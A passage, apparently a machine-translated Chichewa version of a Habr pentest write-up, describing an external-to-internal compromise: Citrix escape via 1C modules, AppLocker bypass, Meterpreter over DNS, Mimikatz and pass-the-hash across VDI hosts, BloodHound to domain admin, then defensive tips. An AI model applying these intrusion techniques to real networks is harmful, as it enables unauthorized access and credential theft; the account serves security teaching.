Zachidziwikire, "chinthu chachiwiri" chinawonjezeredwa nthawi yomweyo ku akaunti yosokonekera ngati pulogalamu ya foni yanga. Panali pulogalamu yomwe imatha kutumiza mokweza pempho ku foni ndi mabatani "kuvomereza" / "kutsutsa" kuti achitepo, kapena kuwonetsa mwakachetechete kachidindo ka OTP pa zenera kuti mulowenso pawokha. Komanso, njira yoyamba imayenera ndi malangizo kuti ikhale yolondola yokha, koma siinagwire ntchito, mosiyana ndi njira ya OTP.
Ndi "chinthu chachiwiri" chosweka, ndidatha kupeza makalata a Outlook Web Access ndi kupeza kutali ku Citrix Netscaler Gateway. Panali zodabwitsa mu imelo ku Outlook:
Mu kuwombera kosowa kumeneku mutha kuwona momwe Roskomnadzor imathandizira ma pentesters
Iyi inali miyezi yoyamba pambuyo pa kutsekeka kwa "mafani" otchuka a Telegalamu, pomwe maukonde onse okhala ndi maadiresi masauzande ambiri adasowa. Zinadziwika bwino chifukwa chake kukankhira sikunagwire ntchito nthawi yomweyo komanso chifukwa chake "wozunzidwa" wanga sanamve phokoso chifukwa anayamba kugwiritsa ntchito akaunti yake panthawi yotsegula.
Aliyense amene amadziwa Citrix Netscaler akuganiza kuti nthawi zambiri imayendetsedwa m'njira yoti chithunzi chokhacho chikhoza kuperekedwa kwa wogwiritsa ntchito, kuyesera kuti asamupatse zida zoyambitsa mapulogalamu a chipani chachitatu ndi kusamutsa deta, kuchepetsa njira zonse zomwe zingatheke. kudzera mu zipolopolo zokhazikika. "Wozunzidwa" wanga, chifukwa cha ntchito yake, adangopeza 1C:
Nditayenda mozungulira mawonekedwe a 1C pang'ono, ndapeza kuti pali ma module opangira kunja uko. Zitha kutumizidwa kuchokera ku mawonekedwe, ndipo zidzaperekedwa kwa kasitomala kapena seva, malingana ndi ufulu ndi zoikamo.
Ndidafunsa abwenzi anga opanga mapulogalamu a 1C kuti apange njira yomwe ingavomereze chingwe ndikuchichita. M'chinenero cha 1C, kuyambitsa ndondomeko kumawoneka ngati iyi (yotengedwa pa intaneti). Kodi mukuvomereza kuti mawu a chinenero cha 1C amadabwitsa anthu olankhula Chirasha ndi kusinthasintha kwake?
Ntchitoyi idachitidwa mwangwiro; zidakhala zomwe pentesters amachitcha "chipolopolo" - Internet Explorer idayambitsidwa kudzeramo.
M'mbuyomu, adilesi ya dongosolo lomwe limakulolani kuyitanitsa ziphaso kupita kugawo linapezeka pamakalata. Ndinayitanitsa chiphaso ngati ndiyenera kugwiritsa ntchito vector ya WiFi.
Pali zokambilana pa intaneti zoti kunalibe chakudya chokoma chaulere ku ofesi yamakasitomala, komabe ndimakonda kukulitsa chiwopsezo chakutali, ndikodekha.
AppLocker idatsegulidwa pa seva yogwiritsira ntchito yomwe ikuyenda ndi Citrix, koma idadutsidwa. Meterpreter yomweyi idakwezedwa ndikuyambitsidwa kudzera pa DNS, popeza ma http (s) matembenuzidwe sanafune kulumikizana, ndipo sindimadziwa adilesi yamkati ya proxy panthawiyo. Mwa njira, kuyambira nthawi ino, pentest yakunja idasandulika kukhala yamkati.
Gawo 4. Ufulu wa Admin kwa ogwiritsa ntchito ndi oyipa, chabwino?
Ntchito yoyamba ya pentester potenga ulamuliro wa gawo la ogwiritsa ntchito ndikusonkhanitsa zidziwitso zonse zaufulu mu domain. Pali chida cha BloodHound chomwe chimakupatsani mwayi wotsitsa zidziwitso za ogwiritsa ntchito, makompyuta, magulu achitetezo kudzera pa protocol ya LDAP kuchokera kwa woyang'anira dera, komanso kudzera pa SMB - zambiri za yemwe adalowa kumene komanso yemwe ali woyang'anira wakomweko.
Njira yodziwikiratu yolanda ufulu wa oyang'anira domeni imawoneka yosavuta ngati kachitidwe kosokoneza:
- Timapita kumakompyuta omwe ali ndi ufulu woyang'anira dera, kutengera maakaunti omwe adagwidwa kale.
- Timakhazikitsa Mimikatz ndikupeza mawu achinsinsi osungidwa, matikiti a Kerberos ndi ma hashes a NTLM a ma domain account omwe adalowa mudongosolo lino. Kapena timachotsa chithunzi cha lsass.exe ndikuchita zomwezo kumbali yathu. Izi zimagwira ntchito bwino ndi Windows yocheperapo 2012R2/Windows 8.1 yokhala ndi zosintha zosasintha.
- Timazindikira komwe maakaunti osokonezedwa ali ndi ufulu woyang'anira. Timabwereza mfundo yoyamba. Nthawi zina timapeza ufulu woyang'anira dera lonselo.
"Mapeto a Cycle;", monga olemba mapulogalamu a 1C angalembe apa.
Chifukwa chake, wogwiritsa ntchito wathu adakhala woyang'anira m'dera limodzi ndi Windows 7, dzina lomwe limaphatikizapo mawu oti "VDI", kapena "Virtual Desktop Infrastructure", makina enieni amunthu. Mwinamwake, mlengi wa utumiki wa VDI amatanthauza kuti popeza VDI ndi makina ogwiritsira ntchito munthu, ngakhale wogwiritsa ntchito asintha malo a mapulogalamu momwe akufunira, wolandirayo akhoza "kubwezeretsedwanso". Ndinaganizanso kuti lingalirolo linali labwino, ndinapita kwa wolandira VDI uyu ndikumanga chisa kumeneko:
- Ndinayika kasitomala wa OpenVPN pamenepo, yemwe adapanga njira kudzera pa intaneti kupita ku seva yanga. Wogulayo amayenera kukakamizidwa kuti adutse Blue Coat yomweyo ndi kutsimikizika kwa domain, koma OpenVPN idatero, monga amanenera, "kunja kwa bokosi."
- Adayika OpenSSH pa VDI. Chabwino, kwenikweni, Windows 7 popanda SSH ndi chiyani?
Izi ndi zomwe zinkawoneka ngati live. Ndiroleni ndikukumbutseni kuti zonsezi ziyenera kuchitika kudzera mu Citrix ndi 1C:
Njira imodzi yolimbikitsira mwayi wopezeka pamakompyuta oyandikana nawo ndiyo kuyang'ana mawu achinsinsi a oyang'anira am'deralo kuti agwirizane. Apa mwayi unkadikirira nthawi yomweyo: hashi ya NTLM ya woyang'anira wamba (yemwe adatchedwa mwadzidzidzi Administrator) adayandikira kuukira kwa ma VDI oyandikana nawo, omwe anali mazana angapo. Inde, kuukirako kunawagwera nthaΕ΅i yomweyo.
Apa ndi pomwe olamulira a VDI adadziwombera pamapazi kawiri:
- Nthawi yoyamba inali pamene makina a VDI sanabweretsedwe pansi pa LAPS, makamaka kusunga mawu achinsinsi a woyang'anira m'deralo kuchokera pa chithunzi chomwe chinatumizidwa kwambiri ku VDI.
- Woyang'anira wosasintha ndiye akaunti yokhayo yakumalo yomwe ili pachiwopsezo chodutsa-the-hash. Ngakhale ndi mawu achinsinsi omwewo, zingatheke kupewa kusokoneza anthu ambiri popanga akaunti yachiwiri ya woyang'anira m'deralo ndi mawu achinsinsi ovuta kwambiri ndikuletsa yosasinthika.
Chifukwa chiyani pali ntchito ya SSH pa Windows imeneyo? Zosavuta kwambiri: tsopano seva ya OpenSSH sinangopereka chipolopolo chothandizira chothandizira popanda kusokoneza ntchito ya wogwiritsa ntchito, komanso socks5 proxy pa VDI. Kupyolera mu masokosi awa, ndidalumikiza kudzera pa SMB ndikusonkhanitsa maakaunti osungidwa kuchokera kumakina onsewa a VDI, kenako ndinayang'ana njira yopita kwa woyang'anira madambwe kuwagwiritsa ntchito mu ma graph a BloodHound. Ndili ndi mazana a olandira alendo, ndinapeza njira imeneyi mofulumira kwambiri. Ufulu wa woyang'anira dera wapezedwa.
Nachi chithunzi chochokera pa intaneti chowonetsa kusaka kofananako. Malumikizidwe akuwonetsa yemwe ali komwe woyang'anira ali komanso yemwe walowetsedwa kuti.
Mwa njira, kumbukirani mkhalidwe kuyambira pachiyambi cha polojekiti - "musagwiritse ntchito chikhalidwe cha anthu." Chifukwa chake, ndikulingalira kuti ndiganizire kuchuluka kwa Bollywood yonseyi yokhala ndi zotsatira zapadera zikadadulidwa ngati zikanatheka kugwiritsa ntchito banal phishing. Koma panokha, zinali zosangalatsa kwambiri kwa ine kuchita zonsezi. Ndikukhulupirira kuti mwasangalala kuwerenga izi. Zoonadi, si ntchito iliyonse yomwe imawoneka yochititsa chidwi kwambiri, koma ntchito yonseyi ndi yovuta kwambiri ndipo siyilola kuti iziyimire.
Mwinamwake wina adzakhala ndi funso: momwe mungadzitetezere? Ngakhale nkhaniyi ikufotokoza njira zambiri, zambiri zomwe oyang'anira Windows sadziwa nkomwe. Komabe, ndikupempha kuti ndiwayang'ane kuchokera kumalingaliro olakwika komanso njira zotetezera zidziwitso:
- osagwiritsa ntchito mapulogalamu achikale (kumbukirani Windows 2003 pachiyambi?)
- osatsegula machitidwe osafunikira (chifukwa chiyani panali tsamba la urologist?)
- yang'anani mawu achinsinsi a ogwiritsa ntchito kuti adzilimbitsa nokha (apo ayi asirikali ... pentesters adzachita izi)
- osakhala ndi mawu achinsinsi omwe mumaakaunti osiyanasiyana (VDI compromise)
- ndi zina
Zoonadi, izi ndizovuta kwambiri kuzikwaniritsa, koma mβnkhani yotsatira tidzasonyeza mwakuchita kuti nβzotheka ndithu.
Source: www.habr.com